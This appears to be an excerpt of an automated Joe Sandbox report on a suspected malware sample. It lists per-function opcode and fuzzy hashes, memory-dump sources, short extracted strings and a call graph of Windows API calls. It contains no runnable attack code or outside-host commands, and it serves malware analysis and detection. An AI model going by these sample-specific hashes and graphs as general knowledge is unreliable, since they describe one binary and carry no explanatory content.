                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: e7cc8606267a7fa11bb9ad1c341c1755ca3bd437be612639f166c915ed482fb0
                                                                                                                                                                                                                  • Instruction ID: 69ade1dfd8f7792594b5d915e4717e7c4faf2fb54c3b66097ae118ca8df7b6d0
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7cc8606267a7fa11bb9ad1c341c1755ca3bd437be612639f166c915ed482fb0
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76B092340503088BC3003B68FC2D098BB68AE04602740002AF10AC0230AA2018018A70
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DE09B0 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 8348df1b060a235ba87bce9af410b0e82c9c28a02a6b3f184f8b1cda938715fc
                                                                                                                                                                                                                  • Instruction ID: a5e42bde9282b9770cf0d12ae12ffabd8180daf74a70aea3cf4db8094eaa97a5
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8348df1b060a235ba87bce9af410b0e82c9c28a02a6b3f184f8b1cda938715fc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41900231044B0C8B454127957C09659B75C95455197804062A50D916165A65652446A5
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                  Function 013C87D8 Relevance: 2.8, Strings: 2, Instructions: 331COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (hq$,hq
                                                                                                                                                                                                                  • API String ID: 0-261841339
                                                                                                                                                                                                                  • Opcode ID: b229ae1c5f9de3517c3d70700c2e3cca77c17dabae46c5c9cbd78a800faac578
                                                                                                                                                                                                                  • Instruction ID: a07bc5a8b0b5cae7c28e223355c979e28a55728ed031096a8cc0da0566b0360e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b229ae1c5f9de3517c3d70700c2e3cca77c17dabae46c5c9cbd78a800faac578
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50D12974A006048FDB15DF6CC584AAABBF2FF88B15F25C599E505AB362C730ED41CB60
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DECCD3 Relevance: 1.6, Strings: 1, Instructions: 387COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: LRdq
                                                                                                                                                                                                                  • API String ID: 0-3106745678
                                                                                                                                                                                                                  • Opcode ID: 56fe5d78d9c0d46cc6ef6e2f4b738180c405c0b217ef3f5809d5c84382f7bda5
                                                                                                                                                                                                                  • Instruction ID: 99792107060973660280fcfa61ec4e95dbb2ec35a802574c9eb03516c0937241
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56fe5d78d9c0d46cc6ef6e2f4b738180c405c0b217ef3f5809d5c84382f7bda5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8F18071E002698FCB14DF6AC880AADBBF3EF85310F29C1A9D059DB255D734AD85CB60
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DED7C0 Relevance: 1.5, Strings: 1, Instructions: 299COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                                                  • Opcode ID: d0ba71e37b1ed14f32b1293aa6f664ec04c749a367ed3f75de05b69c8e4f3a7a
                                                                                                                                                                                                                  • Instruction ID: 98d38b30f03782f3fc0430cbc9c358cd5642282a491991ec12b130da91a78f9c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0ba71e37b1ed14f32b1293aa6f664ec04c749a367ed3f75de05b69c8e4f3a7a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DBA1AB71F001198FCB00EFAAC8805AEBBB2FBC8311B19857AD519DB755DB30ED518BA1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DECDCE Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: LRdq
                                                                                                                                                                                                                  • API String ID: 0-3106745678
                                                                                                                                                                                                                  • Opcode ID: e72ad44cd677b7daed7f9dae12d8cd3781549279a3e8f3570d1a5230a4013ecd
                                                                                                                                                                                                                  • Instruction ID: 00fa2efb6b6e32475e881042b490a8b35937e651dd4abcf19ed7cc9891fc1fb7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e72ad44cd677b7daed7f9dae12d8cd3781549279a3e8f3570d1a5230a4013ecd
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E916071E102598FCB18DF69C880AADB7B3FF85300F29C569D409AB255D734AD86CF60
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DE8150 Relevance: .2, Instructions: 250COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: e37195c69094cc067cd406f99143e66fe464917596e50b749a247681e7d94f51
                                                                                                                                                                                                                  • Instruction ID: fa27904757510d6a7a8043b91e5d582d670b547714e74117c82a69f0299fc0af
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e37195c69094cc067cd406f99143e66fe464917596e50b749a247681e7d94f51
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6A13A70A04345EFD710EF8AC885BEAB7F2FB84300F188565D5499B654CB74E946EFA0
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DED3D9 Relevance: .2, Instructions: 191COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 47ad53e75906aff00b22f1f6a12a4589a3aa351b9f509e698ec8e64e9ca0cbe6
                                                                                                                                                                                                                  • Instruction ID: 0b81f2bb11f7369bb8fa8afa810a6549dbe349c5d490c873b45691d4754cbaac
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47ad53e75906aff00b22f1f6a12a4589a3aa351b9f509e698ec8e64e9ca0cbe6
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44613D32F106258FD714DB6DC880A5EB3E3AFC8711F1A8174E4099B3AADE34EC018B90
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DE2BB7 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 9c832455c4b16bd504c29b5ca200ce2776bea5ccd565baccca9788c649de885f
                                                                                                                                                                                                                  • Instruction ID: f02e170f3281bd7883867a5407df19717779085c12e19b6f04915a9f035ca9e9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c832455c4b16bd504c29b5ca200ce2776bea5ccd565baccca9788c649de885f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59419B2450D3C0CFC7038B7D84A91DABFB0EF0732876989FACCC16B066EA65644AD761
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DEC8FE Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: b6618d1956c75a28d5ecaf6822ba489b5e4b688461ed5ebbc8014a6d9c020e7e
                                                                                                                                                                                                                  • Instruction ID: 49c4a710d0cebff49dc17f7bf9fe2705a83bbe8770b1a1ae4394b15b432e2626
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6618d1956c75a28d5ecaf6822ba489b5e4b688461ed5ebbc8014a6d9c020e7e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06410878E5021E8FDF50DBAAE890AAEB7B1BF48304F15A615D016EB251DB319941CBA0
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013CE3F0 Relevance: 7.9, Strings: 6, Instructions: 407COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: (hq$4'dq$4'dq$4'dq$4'dq$phq
                                                                                                                                                                                                                  • API String ID: 0-3112631775
                                                                                                                                                                                                                  • Opcode ID: 699445a4fad2f84a9cc7e94eacb966b3b0f0c5644986a4b86b31f9f0908a1b9c
                                                                                                                                                                                                                  • Instruction ID: 24a9bcd917104e332387b6b1ee529bec99e454791c949f510b01971c8eae507e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 699445a4fad2f84a9cc7e94eacb966b3b0f0c5644986a4b86b31f9f0908a1b9c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42D13E76900214DFCB05DFA8C844E9A7FB6FF88714F0644A8E609AB272D731ED55DB90
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013C20A4 Relevance: 5.0, Strings: 4, Instructions: 3COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: TJiq$jjjjjj$$dq$$dq
                                                                                                                                                                                                                  • API String ID: 0-1535892779
                                                                                                                                                                                                                  • Opcode ID: c4875e288ef759c1578f868442d5b374683fcffacfc613321b827231197d4b12
                                                                                                                                                                                                                  • Instruction ID: dbf4953322892026b1983b6b970265862ac1a432a4662828b98e0d796673ab3e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4875e288ef759c1578f868442d5b374683fcffacfc613321b827231197d4b12
                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                  Execution Coverage:11.5%
                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                  Signature Coverage:5.8%
                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                  Total number of Limit Nodes:59
                                                                                                                                                                                                                  execution_graph 25500 401000 memset GetModuleHandleW HeapCreate 26439 4298d0 HeapCreate HeapAlloc 25500->26439 25502 40104e 26440 42773f 25502->26440 25506 40105d 26446 42746d 25506->26446 25516 401076 26466 41fc82 InitializeCriticalSection GetStockObject 25516->26466 25518 40107b 26471 41c9e9 25518->26471 25522 401085 26507 41b4a0 25522->26507 25526 40108f 26517 410817 25526->26517 25530 40109e 26521 40f481 25530->26521 25532 4010a3 26526 40f109 memset InitCommonControlsEx CoInitialize 25532->26526 25534 4010a8 26527 40e17f InitializeCriticalSection 25534->26527 25536 4010ad 26528 40a18c 25536->26528 25543 427b1d 16 API calls 25544 4010f2 25543->25544 25545 427a6c 11 API calls 25544->25545 25546 40110d 25545->25546 26547 4048d2 25546->26547 25549 401134 26556 411387 25549->26556 25550 40111b 26555 40f140 20 API calls 25550->26555 25553 40112f 25555 40481e ExitProcess 25553->25555 25554 401152 26561 40f4b0 25554->26561 26946 429920 HeapFree HeapDestroy 25555->26946 25557 40482d HeapDestroy ExitProcess 25559 401170 26566 41bf0e 25559->26566 25565 40119e 26582 429950 25565->26582 25567 4011a8 26586 40702e 25567->26586 25570 429950 2 API calls 25571 4011be 25570->25571 26601 4299b0 25571->26601 25573 4011c8 26605 41c006 25573->26605 25576 4011e4 26947 40f140 20 API calls 25576->26947 25577 401207 25578 429950 2 API calls 25577->25578 25580 401218 25578->25580 25582 429950 2 API calls 25580->25582 25581 4011f8 26948 4049a5 25581->26948 25584 401222 25582->25584 25587 4299b0 2 API calls 25584->25587 25589 40122c 25587->25589 25588 401202 25588->25555 25590 40f4b0 4 API calls 25589->25590 25591 40123e 25590->25591 26610 41b620 25591->26610 25594 401267 26613 41b640 25594->26613 25595 4013eb 26956 40f140 20 API calls 25595->26956 25598 4013ff 26957 4048a2 ReleaseMutex CloseHandle CoUninitialize 25598->26957 25599 401271 26618 41b6a0 25599->26618 25604 401294 25605 41b640 2 API calls 25604->25605 25606 4012ac 25605->25606 25607 41b6a0 2 API calls 25606->25607 25608 4012d7 25607->25608 25609 41b6f0 7 API calls 25608->25609 25610 4012e1 25609->25610 25611 41b640 2 API calls 25610->25611 25612 4012f9 25611->25612 25613 41b6a0 2 API calls 25612->25613 25614 401336 25613->25614 26631 41b5e0 25614->26631 25617 4013b7 25619 41b430 5 API calls 25617->25619 25620 4013c1 25619->25620 26954 40f140 20 API calls 25620->26954 25623 4013d5 26955 4048a2 ReleaseMutex CloseHandle CoUninitialize 25623->26955 25624 40134a 25626 4013ab 25624->25626 26634 41b760 25624->26634 26641 41b7c0 25624->26641 26648 41b430 25626->26648 25629 41b430 5 API calls 25630 4013e9 25629->25630 25631 429950 2 API calls 25630->25631 25632 40141a 25631->25632 25633 4299b0 2 API calls 25632->25633 25634 401424 25633->25634 26655 404952 25634->26655 25637 401459 25640 429950 2 API calls 25637->25640 25638 40143b 26958 40f140 20 API calls 25638->26958 25642 401470 25640->25642 25641 40144f 26959 4048a2 ReleaseMutex CloseHandle CoUninitialize 25641->26959 25644 429950 2 API calls 25642->25644 25645 40147a 25644->25645 26665 41c085 25645->26665 25648 4014f2 25651 429950 2 API calls 25648->25651 25649 4014ab 25650 429950 2 API calls 25649->25650 25652 4014c2 25650->25652 25653 401509 25651->25653 25654 429950 2 API calls 25652->25654 25655 429950 2 API calls 25653->25655 25656 4014cc 25654->25656 25657 401513 25655->25657 26960 426c00 25656->26960 25659 41b5e0 10 API calls 25657->25659 25660 40152e 25659->25660 25661 401561 25660->25661 25662 401538 25660->25662 25664 429950 2 API calls 25661->25664 26963 41b810 6 API calls 25662->26963 25666 401578 25664->25666 25665 401557 25667 41b430 5 API calls 25665->25667 25668 429950 2 API calls 25666->25668 25667->25661 25669 401582 25668->25669 25672 426c00 39 API calls 25669->25672 25670 4014e7 25671 4015eb 25670->25671 26964 426c4e 25670->26964 25674 429950 2 API calls 25671->25674 25672->25670 25675 401602 25674->25675 25676 429950 2 API calls 25675->25676 25677 40160c 25676->25677 26681 40fcae 25677->26681 25680 4018f0 25681 4018fa 25680->25681 25682 40191d 25680->25682 27067 40f140 20 API calls 25681->27067 25686 429950 2 API calls 25682->25686 25684 401637 25694 401649 25684->25694 26989 408b02 25684->26989 25688 401934 25686->25688 25687 40190e 25692 4049a5 35 API calls 25687->25692 25689 429950 2 API calls 25688->25689 25693 40193e 25689->25693 25696 401913 25692->25696 26705 41b600 25693->26705 27055 410007 6 API calls 25694->27055 25695 401682 25701 408b02 19 API calls 25695->25701 25704 401694 25695->25704 27068 4048a2 ReleaseMutex CloseHandle CoUninitialize 25696->27068 25701->25704 25702 4016cd 25707 408b02 19 API calls 25702->25707 25710 4016df 25702->25710 25703 401c10 25706 427b1d 16 API calls 25703->25706 27056 410007 6 API calls 25704->27056 25708 401c1b 25706->25708 25707->25710 25711 427a6c 11 API calls 25708->25711 27057 410007 6 API calls 25710->27057 25713 401c36 25711->25713 25712 401718 25717 408b02 19 API calls 25712->25717 25722 40172a 25712->25722 25716 429950 2 API calls 25713->25716 25715 401c05 25719 41b430 5 API calls 25715->25719 25721 401c4d 25716->25721 25717->25722 25718 401763 25724 408b02 19 API calls 25718->25724 25728 401775 25718->25728 25719->25703 25723 429950 2 API calls 25721->25723 27058 410007 6 API calls 25722->27058 25727 401c57 25723->25727 25724->25728 25726 41b910 15 API calls 25898 401971 25726->25898 25730 41b600 10 API calls 25727->25730 27059 410007 6 API calls 25728->27059 25729 4017ae 25734 408b02 19 API calls 25729->25734 25736 4017c0 25729->25736 25731 401c72 25730->25731 25732 401d6c 25731->25732 25787 401c8a 25731->25787 25735 429950 2 API calls 25732->25735 25734->25736 25739 401d83 25735->25739 27060 410007 6 API calls 25736->27060 25738 4017f9 25742 408b02 19 API calls 25738->25742 25745 40180b 25738->25745 25740 429950 2 API calls 25739->25740 25744 401d8d 25740->25744 25741 4299b0 RtlAllocateHeap HeapReAlloc 25741->25898 25742->25745 25747 40fcae 47 API calls 25744->25747 27061 410007 6 API calls 25745->27061 25746 401844 25749 408b02 19 API calls 25746->25749 25754 401856 25746->25754 25750 401d9b 25747->25750 25748 401d61 25753 41b430 5 API calls 25748->25753 25749->25754 25755 4021db 25750->25755 25757 41002f 6 API calls 25750->25757 25753->25732 27062 410007 6 API calls 25754->27062 26708 4092f8 25755->26708 25756 40188f 25762 408b02 19 API calls 25756->25762 25766 4018a1 25756->25766 25760 401db3 25757->25760 25764 410143 11 API calls 25760->25764 25762->25766 25763 4018da 27064 410024 25763->27064 25767 401dc9 25764->25767 25765 4299b0 2 API calls 25768 4021fb 25765->25768 27063 410007 6 API calls 25766->27063 25770 4299b0 2 API calls 25767->25770 25771 4092f8 41 API calls 25768->25771 25772 401dd3 25770->25772 25773 402211 25771->25773 25775 410143 11 API calls 25772->25775 25776 4299b0 2 API calls 25773->25776 25774 41b910 15 API calls 25774->25787 25777 401de9 25775->25777 25811 40221b 25776->25811 25778 4299b0 2 API calls 25777->25778 25779 401df3 25778->25779 27075 410007 6 API calls 25779->27075 25781 4092f8 41 API calls 25781->25898 25782 401e02 27076 410007 6 API calls 25782->27076 25784 402281 25788 402290 25784->25788 25789 40246a 25784->25789 25785 4299b0 RtlAllocateHeap HeapReAlloc 25785->25787 25786 401e16 27077 410007 6 API calls 25786->27077 25787->25748 25787->25774 25787->25785 27073 41b870 8 API calls 25787->27073 27074 427b85 5 API calls _strftime 25787->27074 27097 40e2c4 10 API calls 25788->27097 25792 402479 25789->25792 25793 402c7b 25789->25793 25795 429950 2 API calls 25792->25795 27145 4070db GetUserDefaultLangID wcslen HeapAlloc HeapReAlloc HeapFree 25793->27145 25794 402295 25799 429950 2 API calls 25794->25799 25800 402490 25795->25800 25796 401e2a 27078 410007 6 API calls 25796->27078 25797 4299b0 RtlAllocateHeap HeapReAlloc 25797->25811 25803 4022ac 25799->25803 25804 429950 2 API calls 25800->25804 25802 402c80 25807 4245d6 27 API calls 25802->25807 25808 429950 2 API calls 25803->25808 25809 40249a 25804->25809 25805 401e3e 27079 410007 6 API calls 25805->27079 25806 428950 10 API calls 25806->25811 25812 402cac 25807->25812 25813 4022b6 25808->25813 25814 40fcae 47 API calls 25809->25814 25811->25784 25811->25797 25811->25806 25817 402cb4 25812->25817 25818 402c51 25812->25818 25819 426c00 39 API calls 25813->25819 25820 4024a8 25814->25820 25816 401e52 27080 410007 6 API calls 25816->27080 27146 4246a5 HeapAlloc HeapReAlloc DestroyAcceleratorTable CreateAcceleratorTableW 25817->27146 25830 429950 2 API calls 25818->25830 25839 4022d1 25819->25839 25824 402c53 25820->25824 25825 4024b6 25820->25825 25823 402cc8 25837 4201e2 13 API calls 25823->25837 27143 40f140 20 API calls 25824->27143 25828 429950 2 API calls 25825->25828 25826 401e66 27081 410007 6 API calls 25826->27081 25833 4024c7 25828->25833 25831 402ec3 25830->25831 25836 429950 2 API calls 25831->25836 25832 402c67 25838 4049a5 35 API calls 25832->25838 25840 429950 2 API calls 25833->25840 25835 401e7a 25841 410143 11 API calls 25835->25841 25843 402ecd 25836->25843 25844 402cf1 25837->25844 25845 402c6c 25838->25845 25839->25789 27098 4245d6 25839->27098 25846 4024d1 25840->25846 25842 401e95 25841->25842 25847 4299b0 2 API calls 25842->25847 25848 41c085 8 API calls 25843->25848 27147 420355 25844->27147 27144 4048a2 ReleaseMutex CloseHandle CoUninitialize 25845->27144 25851 4299b0 2 API calls 25846->25851 25852 401e9f 25847->25852 25865 402edb 25848->25865 25855 4024db 25851->25855 27082 410007 6 API calls 25852->27082 26858 41002f 25855->26858 25858 402313 25862 40237b 25858->25862 25869 40232b SetWindowLongW 25858->25869 25860 401eae 27083 410007 6 API calls 25860->27083 25861 402d36 27151 4209ea 25861->27151 25867 429950 2 API calls 25862->25867 25873 429950 2 API calls 25865->25873 25922 402f30 25865->25922 25875 402392 25867->25875 27101 4245f9 25869->27101 25870 4024fb 25877 4299b0 2 API calls 25870->25877 25871 428950 10 API calls 25871->25898 25872 401ec2 27084 410007 6 API calls 25872->27084 25881 402f0d 25873->25881 25883 429950 2 API calls 25875->25883 25886 402505 25877->25886 25879 402fa2 25884 427011 33 API calls 25879->25884 25880 402f5e 25888 429950 2 API calls 25880->25888 25890 429950 2 API calls 25881->25890 25892 40239c 25883->25892 25893 402f9a 25884->25893 25885 402340 ShowWindow 25894 402350 25885->25894 26886 428950 25886->26886 25887 401ed6 25896 410143 11 API calls 25887->25896 25897 402f75 25888->25897 25889 429950 wcslen RtlReAllocateHeap 25889->25898 25899 402f18 25890->25899 25901 41c085 8 API calls 25892->25901 25902 429950 2 API calls 25893->25902 27103 424615 25894->27103 25904 401ef1 25896->25904 25905 429950 2 API calls 25897->25905 25898->25715 25898->25726 25898->25741 25898->25781 25898->25871 25898->25889 27069 41b870 8 API calls 25898->27069 27070 427b85 5 API calls _strftime 25898->27070 27071 40a194 48 API calls 25898->27071 27072 40adb0 9 API calls 25898->27072 25906 429950 2 API calls 25899->25906 25900 429950 2 API calls 25907 402d9e 25900->25907 25925 4023aa 25901->25925 25908 402fc9 25902->25908 25911 4299b0 2 API calls 25904->25911 25912 402f7f 25905->25912 25913 402f22 25906->25913 25914 429950 2 API calls 25907->25914 25917 429950 2 API calls 25908->25917 25910 4299b0 2 API calls 25919 40252c 25910->25919 25920 401efb 25911->25920 25921 426c00 39 API calls 25912->25921 25915 41c085 8 API calls 25913->25915 25916 402da8 25914->25916 25915->25922 25923 41b620 10 API calls 25916->25923 25926 402fd3 25917->25926 25928 41002f 6 API calls 25919->25928 25929 410143 11 API calls 25920->25929 25921->25893 25922->25879 25922->25880 25931 402dc3 25923->25931 25924 40241d 25930 40e1cd 326 API calls 25924->25930 25925->25924 25932 429950 2 API calls 25925->25932 25933 41c085 8 API calls 25926->25933 25935 402536 25928->25935 25936 401f11 25929->25936 25937 40242e 25930->25937 25938 402e57 25931->25938 25955 402dd1 25931->25955 25939 4023e4 25932->25939 25959 402fe1 25933->25959 25941 410143 11 API calls 25935->25941 25942 4299b0 2 API calls 25936->25942 25966 402448 25937->25966 27118 42469d 31 API calls 25937->27118 27119 41c8c7 timeBeginPeriod Sleep timeEndPeriod 25937->27119 27166 40f140 20 API calls 25938->27166 25947 429950 2 API calls 25939->25947 25948 40254c 25941->25948 25943 401f1b 25942->25943 27085 410007 6 API calls 25943->27085 25951 4023ee 25947->25951 25952 4299b0 2 API calls 25948->25952 25950 402e6b 25956 4049a5 35 API calls 25950->25956 27116 40e4bc 21 API calls 25951->27116 25958 402556 25952->25958 25953 401f2a 27086 410007 6 API calls 25953->27086 25968 402e32 25955->25968 27164 41b870 8 API calls 25955->27164 27165 41b910 15 API calls 25955->27165 25961 402e70 25956->25961 25963 410143 11 API calls 25958->25963 25964 429950 2 API calls 25959->25964 26007 403036 25959->26007 27167 4048a2 ReleaseMutex CloseHandle CoUninitialize 25961->27167 25962 402409 25962->25924 27117 40e776 7 API calls 25962->27117 25971 40256c 25963->25971 25972 403013 25964->25972 25965 401f3e 25974 410143 11 API calls 25965->25974 27120 40e7f7 Sleep memset HeapFree 25966->27120 25979 41b430 5 API calls 25968->25979 25969 403064 25978 429950 2 API calls 25969->25978 25970 4030a8 25975 427011 33 API calls 25970->25975 25980 4299b0 2 API calls 25971->25980 25973 429950 2 API calls 25972->25973 25983 40301e 25973->25983 25984 401f59 25974->25984 25985 4030a0 25975->25985 25987 40307b 25978->25987 25981 402e3c 25979->25981 25981->25818 25990 429950 2 API calls 25983->25990 25991 4299b0 2 API calls 25984->25991 26889 406de3 25985->26889 25988 429950 2 API calls 25987->25988 25994 403085 25988->25994 25996 403028 25990->25996 25997 401f63 25991->25997 